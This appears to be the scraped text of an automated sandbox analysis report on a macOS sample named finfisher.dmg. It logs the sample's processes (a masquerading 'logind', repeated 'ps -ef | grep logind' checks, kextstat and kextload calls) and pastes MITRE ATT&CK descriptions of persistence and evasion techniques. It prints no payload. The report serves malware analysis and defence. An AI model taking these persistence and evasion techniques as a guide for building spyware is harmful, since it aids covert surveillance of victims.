MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 906 Parent PID: 1

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 907 Parent PID: 906

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 908 Parent PID: 907

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 908 Parent PID: 907

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 909 Parent PID: 907

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 909 Parent PID: 907

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 910 Parent PID: 906

General

Start time:	15:35:34
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 911 Parent PID: 906

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 912 Parent PID: 906

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 913 Parent PID: 1

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 913 Parent PID: 1

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 914 Parent PID: 913

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 915 Parent PID: 914

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 915 Parent PID: 914

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 916 Parent PID: 914

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 916 Parent PID: 914

General

Start time:	15:35:44
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 917 Parent PID: 913

General

Start time:	15:35:50
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 918 Parent PID: 913

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 919 Parent PID: 913

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 920 Parent PID: 1

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 920 Parent PID: 1

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 921 Parent PID: 920

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 922 Parent PID: 921

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 922 Parent PID: 921

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 923 Parent PID: 921

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 923 Parent PID: 921

General

Start time:	15:36:00
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 924 Parent PID: 920

General

Start time:	15:36:06
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 925 Parent PID: 920

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 926 Parent PID: 920

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 927 Parent PID: 1

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 927 Parent PID: 1

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 928 Parent PID: 927

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 929 Parent PID: 928

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 929 Parent PID: 928

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 930 Parent PID: 928

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 930 Parent PID: 928

General

Start time:	15:36:16
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 931 Parent PID: 927

General

Start time:	15:36:21
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing .
Tactics:	Execution
Data Sources:	Anti-virus, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in `/System/Library/LaunchAgents` , `/Library/LaunchAgents` , and `$HOME/Library/LaunchAgents` . These launch agents have property list files which point to the executables that will be launched . Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories . The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in . They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as `/Library/Preferences` (which execute with elevated privileges) and `~/Library/Preferences` (which execute with a user's privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature , this activity will result in a valid signature.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report finfisher.dmg

Overview

General Information

Detection

Signatures

Classification

Startup

Yara Overview

Initial Sample

Dropped Files

Signature Overview

AV Detection:

Cryptography:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Signature Similarity

Similar Samples

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Runtime Messages

Created / dropped Files

Static File Info

General

Archive GPT

Archived Files

Extracted Files

Extracted File

Static Mach Info

General Information for header 1

Internal Symbols

External symbols

Extracted File

Extracted File

Extracted File

Static Mach Info

General Information for header 1

Internal Symbols

External symbols

Extracted File

Extracted File

Network Behavior

Network Port Distribution

UDP Packets

System Behavior

Analysis Process: xpcproxy PID: 772 Parent PID: 1